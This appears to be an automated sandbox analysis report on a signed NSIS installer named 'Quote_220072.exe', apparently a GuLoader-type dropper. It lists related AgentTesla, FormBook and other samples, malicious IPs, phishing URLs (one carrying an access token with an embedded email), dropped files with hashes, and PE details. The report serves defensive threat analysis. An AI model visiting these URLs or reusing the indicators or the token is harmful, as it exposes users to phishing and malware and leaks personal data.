	MA2402201136.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	IMG0001.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	PURCHASE ORDER-6350-2024.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	order2024-10-07_174915.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	Proposal From Wachler & Associates PC.pdf	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	217.20.57.42
	Lana_Rhoades_Photoos.js	Get hash	malicious	Unknown	Browse	84.201.210.39
	Proposal From SIOLI Alexander Pino#U2026.pdf	Get hash	malicious	Unknown	Browse	84.201.210.23
	http://www.thearchiterra.gr/	Get hash	malicious	Unknown	Browse	84.201.210.38
	0438.pdf.exe	Get hash	malicious	Unknown	Browse	84.201.210.37
	67JPbskewt.exe	Get hash	malicious	Unknown	Browse	84.201.210.35
	https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9	Get hash	malicious	Unknown	Browse	217.20.57.34
	https://cosiosos.com.de/7i2ko/	Get hash	malicious	HTMLPhisher	Browse	217.20.57.18
	https://www.leadsonline.ca	Get hash	malicious	Unknown	Browse	217.20.57.34
	PRESUPUEST.exe	Get hash	malicious	AsyncRAT	Browse	217.20.57.19

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PUBLIC-DOMAIN-REGISTRYUS	TT Copy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.79.62.115
	24-17745.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	HSBC Payment Advice.exe	Get hash	malicious	FormBook	Browse	208.91.199.22
	H33UCslPzv.exe	Get hash	malicious	XWorm	Browse	103.53.40.62
	PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbs	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	199.79.62.19
	https://landsmith.ae/continue.html	Get hash	malicious	HTMLPhisher	Browse	103.53.42.223
	PO# 4507573387.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	199.79.62.115
	PO #89230.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	FZCO - PO#12345.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.185.193 172.217.18.14
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.185.193 172.217.18.14
	V323904LY3.lNK.lnk	Get hash	malicious	Unknown	Browse	142.250.185.193 172.217.18.14
	PO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.185.193 172.217.18.14
	PO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.185.193 172.217.18.14
	oZ7nac01Em.exe	Get hash	malicious	Stealc, Vidar	Browse	142.250.185.193 172.217.18.14
	SecuriteInfo.com.FileRepMalware.6479.21607.exe	Get hash	malicious	Unknown	Browse	142.250.185.193 172.217.18.14
	WGo3ga1AL9.exe	Get hash	malicious	Stealc, Vidar	Browse	142.250.185.193 172.217.18.14
	FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.185.193 172.217.18.14
	FUNDS TRANSFER - 000009442004 - OUTWARD PAYMENT ADVICE pdf.pif.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.185.193 172.217.18.14

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO-000172483 (2).exe	Get hash	malicious	FormBook, GuLoader	Browse
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	rPO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse
	rPO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse
	gHQQfMh4F3.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Quote_220072.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.97694153396788
Encrypted:	false
SSDEEP:	192:acA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:RR7SrtTv53tdtTgwF4SQbGPX36wJMw
MD5:	D6F54D2CEFDF58836805796F55BFC846
SHA1:	B980ADDC1A755B968DD5799179D3B4F1C2DE9D2D
SHA-256:	F917AEF484D1FBB4D723B2E2D3045CB6F5F664E61FBB3D5C577BD1C215DE55D9
SHA-512:	CE67DA936A93D46EF7E81ABC8276787C82FD844C03630BA18AFC3528C7E420C3228BFE82AEDA083BB719F2D1314AFAE913362ABD1E220CB364606519690D45DB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Quotation.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: PO-000172483.exe, Detection: malicious, Browse Filename: PO-000172483.exe, Detection: malicious, Browse Filename: PO-000172483 (2).exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: rPO-000172483.exe, Detection: malicious, Browse Filename: rPO-000172483.exe, Detection: malicious, Browse Filename: gHQQfMh4F3.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.]!..]!..]!...T..Z!...Y..Z!..]!..I!...T..Y!...T..\!...T..\!...T..\!..Rich]!..................PE..L.....*c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Music\antithetic.ini

Download File

Process:	C:\Users\user\Desktop\Quote_220072.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.264578373902383
Encrypted:	false
SSDEEP:	3:apWPWPjNLCNHiy:UPRCNHiy
MD5:	58AC0B5E1D49D0EE1AED2FE13FAE6C7A
SHA1:	02C8384573D47CA39F2E2ACA32B275861EC59A93
SHA-256:	624F49944CB84ED51FECABCD549AE3B47152F9A20C4A95E93C8B007AEFE9FEAB
SHA-512:	8F5F062D6EBB8312DA4AD4F5AF077B1EAA2E14244823F15E6A87A9E48C7172CC1EA5AB691D3B4F9D8F8E0605F9CB3AA06590B4389820DA531633D9915B988FFC
Malicious:	false
Reputation:	low
Preview:	[broadspread]..slyngvrk=houghband..

C:\Users\user\overlays\besvangredes\Emmens.udk

Download File

Process:	C:\Users\user\Desktop\Quote_220072.exe
File Type:	data
Category:	dropped
Size (bytes):	482519
Entropy (8bit):	1.2446382063037653
Encrypted:	false
SSDEEP:	1536:+yiLw81PnsncGiIsTVODPOqNbsVEVWZkZA4:G/Pne9iIyVODPsVpZkZA4
MD5:	1D099F6122F4B7C8A78925726B59E5C3
SHA1:	EEA154E31FF04CD1A2CED0193F7633ED219CFA47
SHA-256:	1B6DC1EAD079DB05B998725B154E803E6E1504E7E5B49C5611D55E018CD45E6D
SHA-512:	F31F0A285C5A6EB2236CCD49A8BF939E46624F270E0270FC4C5640B37684BC1C7780C5350F778DA8E9D0B8CD25320C1909A9CD937F15BB3A7CDDBCEEE94C47FB
Malicious:	false
Reputation:	low
Preview:	.....................................FP.l...........-...............#............W.............a...............3..........1..i.k.............;......H.............................2..............X..H.....}..................................................M.........M........................................................8......_............8....................................................................?...................................................................................J..............................................T.....................................................B..........................7.....................4........o..P................!........................................................................q..........................................................................l............................;...................................q...............................g.......mm......................................n.......................P.........

C:\Users\user\overlays\besvangredes\Hognoses.Sne

Download File

Process:	C:\Users\user\Desktop\Quote_220072.exe
File Type:	data
Category:	dropped
Size (bytes):	382628
Entropy (8bit):	7.615524931322322
Encrypted:	false
SSDEEP:	6144:Hp5UB/kV1MbtTP3AgT4Q5yAlLwOZ0HSITzdTm3XN96seHBNl5E11S5K:J5UMMbN3t4Q5y2Z0JTzdK3d96T3l5k13
MD5:	C662F57E58B59BF6D8398CC36965101B
SHA1:	B2D9813D1CBDD40BD87E88D96D638E8133B39528
SHA-256:	7FF3268F5BAC4D92B87EE9F88736476E1BEE040E1C4F912F65829675A5EF2220
SHA-512:	36989CEE939554BF4802342699EFFE1B14F80568119DF66C480659D822FAE065C189099D0AFC42B4581FC12839CC8F7D2E5B9E05B3DC993657B19620AA190DCC
Malicious:	false
Reputation:	low
Preview:	.........LL...........}....@.......................M......."......\.F..............................x......d...........GG..........`...........................11................``........................R..............77.............../.................&&....~..u..5g:~.\Z..^..P.K..._R4...[....'p...@&..a.#..o....dBe.;7....r..f....2..}.C..w..t...i.l)....F.Wk.l....A.%..%x.+...w....0......s.f.)$.....q..L......I.o!..9.. ...yz.h.S.d.;...Edy...w.F.0.N.2O<v..8?n..Yc."..u........Y..(...V.\|r..F..-`....Q{.C.>..H...=/.N.f........7.......3.f.Ts...bJMD]......5GU,.6..j1.g:~.\Z..^..P.K.....f....i..R4...[....'p...@&..a.#..o....dBe.;7...}.C...5.wE...f.f..@w..t...i.l)....F.Wk.l....A.%..%x.+...w....0X$.....q..L......I.o!.......b..>.9.. ...yz.*h.S.d.;...0.N.2O<v..8?n..Yc."..u........Y..(...V.\|............F..-`....Q{.C.>..H...=/.N.........3.f.Ts...b..p..r......&MD]......5GU,.6..j1.g:~.\Z..^..P.K..._f!.f....j..(4...[....'p...@&..a.#..o....dBe.;7...}.C..f.........w..t...i.l)....F.Wk.l....A.%.....Df....E%x.

C:\Users\user\overlays\besvangredes\Proprietrer.bet

Download File

Process:	C:\Users\user\Desktop\Quote_220072.exe
File Type:	data
Category:	dropped
Size (bytes):	288955
Entropy (8bit):	1.2577770955280814
Encrypted:	false
SSDEEP:	768:l1SkOmjqFRV/HZzy6+19kZBH4YVHCdJS7G5iOUEEaXXLlgHHl7MRY9hN+418WPK5:KOqvBJzC5vBhp8KT9AGCbQTZkkR
MD5:	0B62328C4966F6B879B3C13B7FBD9C0D
SHA1:	6DD81F12E739E81E06778067513ED1178A06AFC9
SHA-256:	645C325F62AF720972466322B09A7E396E46D8E640B138D582374B68D763A3A7
SHA-512:	2F738A2950352F124F7B969D38B52BD2E4453FF42BC8DEB7566620E6CDEA30368A6DC16230BA49050F8C0327175CAB71DC4A1709541F08A3FFDCF55FAF5B75B8
Malicious:	false
Reputation:	low
Preview:	.........................................s.............i.......................................A.........................4.......;........i................................................_........................-.&..............................+..........................................................8.............................................?....U........................................................~........g... .....?...............................................................f............................S..................................!...........................j.............m....g....................................(............................z....d..........z..........^...............s...........................H............................t..........A.....................\|............................................................[.................................................\.......................v...........o...................................m...........

C:\Users\user\overlays\besvangredes\Trikstanks.pra

Download File

Process:	C:\Users\user\Desktop\Quote_220072.exe
File Type:	data
Category:	dropped
Size (bytes):	340974
Entropy (8bit):	1.254605943274635
Encrypted:	false
SSDEEP:	768:AgVdAd1etxyZmQhZgJwrQTTwKuiTGrJqCoIEsPkZnFFSKsOI4v/3n35lB3LiADa4:5TxLsV5IjQ3xx12
MD5:	49BE0E06F2E4F0CCFFB46426EE262642
SHA1:	FF9C56C31A824E4CA087705C23D01D288FE34239
SHA-256:	A55DAC07FB586D4B64F0DDF812087A2EEEC6F5286D9BC73AD648ED3220ABDD3A
SHA-512:	27E9D035708943DD257186457C15488C9405747FC77F7C76760C96EE011C239F9FA53B5DA17958038FB2BA1C4E27E643E7924A37E6164E250B9F45A109D92E53
Malicious:	false
Reputation:	low
Preview:	.....................................n.........A...5............K.................C.........a............>....................................................................................p...................................................................................................................W.......................................m.........................................M..........................'......i.............................................................................................4....................................}....................................................................................................................................................x...........S..................'..y............................................../..........................................M..................Z.................................V.......................................=.....N...............................n..................................\|. .....

C:\Users\user\overlays\besvangredes\boyaus.rom

Download File

Process:	C:\Users\user\Desktop\Quote_220072.exe
File Type:	data
Category:	dropped
Size (bytes):	392462
Entropy (8bit):	1.241128723454179
Encrypted:	false
SSDEEP:	768:jby0EUrStmwpKcx/orVcYZ+M3ok1I7vZFCDrlv2UV5t3votN6cGia46OGj3OkYSk:FaZaukRTadSdbrJ5N275Ea3nRYS3r
MD5:	F130EC3095DBECEDC791D8C58A59040C
SHA1:	DAD2300B487F31F199520E1B41AB02B7D677B352
SHA-256:	A56351ED69A301F5D9D89B6530280B7A85F998A806E1648911C37B6983BA9426
SHA-512:	8599200F472F2D59390E8F2C497331640B12AB9FAF71817160C6D450EDF8A99F78CEF28CC3B57581D6AECFC1EC90A49947A6685C606321B6EE300D483C838360
Malicious:	false
Preview:	..................J......-..............K....e..........1......................D....................................?............K.V..............................................\....3.......................................L.................................A.........i........,...........................P.{............................................................r................................................V........................................e............&.................................................7...................k.........<...s................).................................................x...............................j................................`.................b.................G.......w..........................................{.........................................G..............................:.................#..............................................<..O......^..........O..............................7..\................................

C:\Users\user\overlays\besvangredes\gear.dra

Download File

Process:	C:\Users\user\Desktop\Quote_220072.exe
File Type:	data
Category:	dropped
Size (bytes):	433786
Entropy (8bit):	1.255949132332751
Encrypted:	false
SSDEEP:	768:NFXORpsqJLOaVDzzoIgUPRGRoYNxHVxyczaUz4pP9Nom56I4tY6UBh1Yc88LaAQo:TUAoYxPzqoIzdwWR1+/24cwZXeCPiIBo
MD5:	53FF1A157920AE92C9BF891D453D6B65
SHA1:	B7BF3B7B16048F38132D8ACCA841130D73DB44C3
SHA-256:	FAD1B5E641DC44B5A51048470D4E0FB47664CF2B994CEA24304495D99323B9DE
SHA-512:	E739381C24627F89255DB55B2DA39A09F055A322C577C3604BA048FB2C817AE7F63B12131F8461491F6140953FB33DD94EB66D8CB3B13B36717143342CE270AF
Malicious:	false
Preview:	......................................j......................................."t......... .............Z..........................................+...o..G.......d......................................................................................X................5....................................F.........'.....................................................U...............................\............Y............)..............................d..D....................................................%.................................................Y..#.......................................................................................................................^.........................................j...........w...............................................n.....................................V..........i.............................................6...7..........*.........................................................................H.............................

C:\Users\user\overlays\besvangredes\jagtfalk.ill

Download File

Process:	C:\Users\user\Desktop\Quote_220072.exe
File Type:	data
Category:	dropped
Size (bytes):	374902
Entropy (8bit):	1.250991222921627
Encrypted:	false
SSDEEP:	1536:XkYzjcLYszRzU5n1C900tMkYQx+gnpovYHO:XkYz4DzQB5sYYH
MD5:	169115C751DDA5E021E8C86E8454B26D
SHA1:	5A8254634C0C726BB18E42E626EAEB581D532DCD
SHA-256:	ACCD4911D88E808AED4A2AA27394628C62574810B0B47977B7103A246FDF2A10
SHA-512:	2B643014E8623CADBA7CE78B91D3C751D60FCBF3FA69FA26F29A14E55679FC6A5C2074834B2496773A1756E3172EC7C898E2DF29CB4A0513DBF8BC0DCDDA7E04
Malicious:	false
Preview:	.......].....................................................S....................................^.4....................=.b.........................................................................o....O..................O........................t..............................I.................................................................;......................................m...................A.....................................i.........................................=...............................................................................................u..&...............................v............=................v...............p...............O.......'.............................K........................;............m......P................x.f....................K[.(..A..........#........................J..L........................i........................X................................................................................N..............f.........

C:\Users\user\overlays\besvangredes\regill.ful

Download File

Process:	C:\Users\user\Desktop\Quote_220072.exe
File Type:	data
Category:	dropped
Size (bytes):	489048
Entropy (8bit):	1.245615736901525
Encrypted:	false
SSDEEP:	1536:HMtjgMjMD1whyMu1IXCVAcFNpruXO+nBJH:stjgmYi03XDL+nBJ
MD5:	B4FB425BAF217F31E91AAB39ABF66DCD
SHA1:	03DE3BD0F923AB14213B6C4461C5CA73A0A6371C
SHA-256:	4BC57A47B82B63EC20B393F65F3585EB81FE3F7748229CD19DEC8FE8A41D67C3
SHA-512:	E72395FD6098130EFD543C5941781A1AA80FCE17C7701CB40FA8874271E0D43E0F7F082EBF5D458181287DE41CF4B34F88DCAABE84D8AD51003EF5DA1495D871
Malicious:	false
Preview:	.............9.....................A..............Z...........=.........................................................h...'.........................................................L..............................................p..C...........................,...................................p..........S............................................................................{............................................(.........C...^.......................................U.........~................................................z.....................................A................................................]..........i.............,....................................g..............................3......K.....................u..............................................................H.t....................................................................................................................`.............................)1.............q..............4....

C:\Users\user\overlays\besvangredes\sortlistningens.txt

Download File

Process:	C:\Users\user\Desktop\Quote_220072.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	4.247837387326688
Encrypted:	false
SSDEEP:	6:r8pLNAsEyv1WABlvMW9uu+IXvVJyQXPhXOQemtNxgFUvNwmA6AQOp2jMPA9cnb:ruJAOgABlQuTXbyKhXOLmtLgHmFOYjMV
MD5:	46003C65AA12A0EBE55662F0141186DC
SHA1:	739652C3375018DAFFB986302A7D3E8D32770B41
SHA-256:	2EA079DEDE1B356842C5F5E0751B5E2B6565FDED65DAFB59A73D170C002ABB27
SHA-512:	59D394789F9EECE97873D56AEA64F353D3E13E007E4ACBD396AC76CB68E91494EB65888049EF05CBE9B20597ADADCC960D067F90AAD3EA5AA46AC3A82F5B82FD
Malicious:	false
Preview:	degageredes indtgters commencing subfunctional rubiator startkatalogernes dismasted outsport..surkaalen syndedes turtledoving,leddelsestes obs jernholdigt normsammenbruds.azotite hestesko hvilkes snrkels enstatitite nappes,slangudtrykkets squills consonantising windchest interpretableness lynkrigen..vinders drikkegildet orgal snakkehjrnets responders etageejendommens..

C:\Users\user\overlays\besvangredes\superacutely.Chr75

Download File

Process:	C:\Users\user\Desktop\Quote_220072.exe
File Type:	data
Category:	dropped
Size (bytes):	146596
Entropy (8bit):	4.598858103844812
Encrypted:	false
SSDEEP:	1536:VVHH1QAyhbDPjvaN4sRBeriRh7VkKfMyRaCjXavNDYqlgGka5OHV6heD7qI000C/:THHuAkzY4yKKf7sC2vNEqaZ/6hrI0FC/
MD5:	E9809833C54E3AD937C0891484E15A3A
SHA1:	64A1D652A38FFD8070B5C110B5D841FCE3B50B88
SHA-256:	1B992AE5A6C0402C451B53C5E4202BD68D563AB416002C16481F128C8943CC2E
SHA-512:	1A065EC17F3D780BF38C163C10C7F89F2AEE7E7A5DE199FE52A0E2555696B0A5FEF6DE39383A7CEF8F23F7CBF3821207BD5F49E3DB19394159A30330BB9011FE
Malicious:	false
Preview:	.................v.~~..aaaaaaa................`..**...==............5.\\.....=.}}}. ............................L..//...............n.............>.......____.r.............4...............h.}}}........F.....,..LLL...............]....j.......$...s.....55.....................22...........^^^...#........8.llll.......PPPPPP.?...}.<<<<...............d........3.>.77........c....W....(((((....................44...............T......z.......OOO.....................................dd......U...[........+................cc................................[.......?.............................######..............s.................>...................TT.............dd.....w.<<<...5.....................(.$$..........................R.......................A...........~~~~..............)......vv............$$$$.........__.<.....(.^.e................\\\........].........rr..............................................................33.....BB................HH.tt...'...c.......XXXX..jj..............

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.812466755832812
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Quote_220072.exe
File size:	1'197'664 bytes
MD5:	ac900546c8bf5b3be3184502d0d2d7ba
SHA1:	6427b2e160082bdb6a5b0213a3de348986f31530
SHA256:	23df64fa762b5942d08dc6bf6f5afc75fc932519a96070af492e237b5483747f
SHA512:	4b6bcd3c9413177629668f37160372b65c598a4c5c2ab7eae0905074761e49105b6e954fcfdccae11501120fba4a2dd59d477eab76911a6dd94e184bd7afeb56
SSDEEP:	24576:T4nhDoAFBOCmg1OJnkFWsksVBNF/ZNXLGQ7WczkxFnfbP97:T+hkcOCm+OWFW+V5BNXKQKczgt
TLSH:	6F45232976A7C08FEA820A385AF7E33BD67AFD102D25852777602B4EFD3528CDD56110
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............o...o...o...k...o...i...o...n...o...n...o.I.k...o.I.....o.I.m...o.Rich..o.................PE..L...!.*c.................n.

File Icon


Icon Hash:	873335651170390f

Static PE Info

General

Entrypoint:	0x4036da
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x632AE721 [Wed Sep 21 10:27:45 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3f91aceea750f765ef2ba5d9988e6a00

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Selvbinderes, O=Selvbinderes, L=Paris 03, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	22/07/2024 03:29:52 22/07/2027 03:29:52
Subject Chain	CN=Selvbinderes, O=Selvbinderes, L=Paris 03, C=FR
Version:	3
Thumbprint MD5:	2DC2FC958F31DF7E02B170AC81A27DCD
Thumbprint SHA-1:	22F659C317C7A886E7364E0F3607F3C379B61AF4
Thumbprint SHA-256:	C191C38E37D3B3A2571E1406691B55FC305D47268B0DC2B40CBB934A663AFAEC
Serial:	234BC0FC872A6A06C77E178A22EF69418C6CA6A1

Entrypoint Preview

Instruction
sub esp, 000003ECh
push ebx
push ebp
push esi
push edi
xor ebx, ebx
mov edi, 00408528h
push 00008001h
mov dword ptr [esp+14h], ebx
mov ebp, ebx
call dword ptr [00408170h]
mov esi, dword ptr [004080ACh]
lea eax, dword ptr [esp+2Ch]
xorps xmm0, xmm0
mov dword ptr [esp+40h], ebx
push eax
movlpd qword ptr [esp+00000144h], xmm0
mov dword ptr [esp+30h], 0000011Ch
call esi
test eax, eax
jne 00007F27F514A7B9h
lea eax, dword ptr [esp+2Ch]
mov dword ptr [esp+2Ch], 00000114h
push eax
call esi
push 00000053h
pop eax
mov dl, 04h
mov byte ptr [esp+00000146h], dl
cmp word ptr [esp+40h], ax
jne 00007F27F514A793h
mov eax, dword ptr [esp+5Ah]
add eax, FFFFFFD0h
mov word ptr [esp+00000140h], ax
jmp 00007F27F514A78Dh
xor eax, eax
jmp 00007F27F514A774h
mov dl, byte ptr [esp+00000146h]
cmp dword ptr [esp+30h], 0Ah
jnc 00007F27F514A78Dh
movzx eax, word ptr [esp+38h]
mov dword ptr [esp+38h], eax
jmp 00007F27F514A786h
mov eax, dword ptr [esp+38h]
mov dword ptr [007A8638h], eax
movzx eax, byte ptr [esp+30h]
shl ax, 0008h
movzx ecx, ax
movzx eax, byte ptr [esp+34h]
or ecx, eax
movzx eax, byte ptr [esp+00000140h]
shl ax, 0008h
shl ecx, 10h
movzx eax, word ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8a00	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3db000	0x3e910	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x123448	0x1218	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6c0b	0x6e00	9178309eee1a86dc5ef945d6826a6897	False	0.6605823863636363	data	6.398414552532143	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1896	0x1a00	0885e83a553c38819d1fab2908ca0cf5	False	0.4307391826923077	data	4.86610208699674	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39e640	0x200	5c0f03a1a77f205400c2cbabec9976c4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x32000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3db000	0x3e910	0x3ea00	2690c3c0c1de505f961321c7e2d6da34	False	0.6915076097804391	data	6.574790239627466	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3db388	0x16482	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.000394451383867
RT_ICON	0x3f1810	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.486498876138649
RT_ICON	0x402038	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.5308492747529956
RT_ICON	0x40b4e0	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.5497227356746766
RT_ICON	0x410968	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.5415682569674067
RT_ICON	0x414b90	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5884854771784233
RT_ICON	0x417138	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6179643527204502
RT_ICON	0x4181e0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6668032786885246
RT_ICON	0x418b68	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.7287234042553191
RT_DIALOG	0x418fd0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x4190d0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x4191f0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x4192b8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x419318	0x84	Targa image data - Map 32 x 25730 x 1 +1	English	United States	0.7348484848484849
RT_VERSION	0x4193a0	0x220	data	English	United States	0.5110294117647058
RT_MANIFEST	0x4195c0	0x349	XML 1.0 document, ASCII text, with very long lines (841), with no line terminators	English	United States	0.5529131985731273

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	ShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
ole32.dll	OleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
